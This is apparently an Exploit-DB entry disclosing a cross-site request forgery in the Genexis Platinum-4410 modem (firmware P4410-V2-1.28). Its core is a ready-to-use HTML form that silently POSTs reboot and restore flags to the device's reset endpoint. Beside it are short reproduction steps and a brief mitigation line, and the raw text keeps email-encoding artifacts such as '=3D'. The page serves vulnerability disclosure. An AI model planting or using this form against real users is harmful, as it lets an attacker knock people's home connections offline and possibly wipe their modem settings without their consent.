Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot

vendor:

Platinum-4410

by:

Mohammed Farhan

6.8

CVSS

MEDIUM

Cross Site Request Forgery

352

CWE

Product Name: Platinum-4410

Affected Version From: P4410-V2-1.28

Affected Version To: P4410-V2-1.28

Patch Exists: NO

Related CWE: N/A

CPE: genexis.co.in/product/ont/

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2020

Genexis Platinum-4410 P4410-V2-1.28 – Cross Site Request Forgery to Reboot

Login to the application and create an HTML file using the code provided. Open the HTML page in the browser and click on 'Submit Request'. This will cause the modem to reboot.

Mitigation:

Implementing a strong authentication mechanism and validating all input data.

Source

Exploit-DB raw data:

# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Date: 10/28/2020
# Exploit Author: Mohammed Farhan
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
# Author Contact: https://twitter.com/farhankn

Vulnerability Details
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Login to the application
Create an HTML file using the below mentioned code

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action=3D"http://192.168.1.1/cgi-bin/mag-reset.asp" method=3D"POS=
T">
      <input type=3D"hidden" name=3D"rebootflag" value=3D"1" />
      <input type=3D"hidden" name=3D"restoreFlag" value=3D"1" />
      <input type=3D"hidden" name=3D"isCUCSupport" value=3D"0" />
      <input type=3D"submit" value=3D"Submit request" />
    </form>
  </body>
</html>

Open the HTML page in the browser and Click on "Submit Request"
Note that modem reboots after the same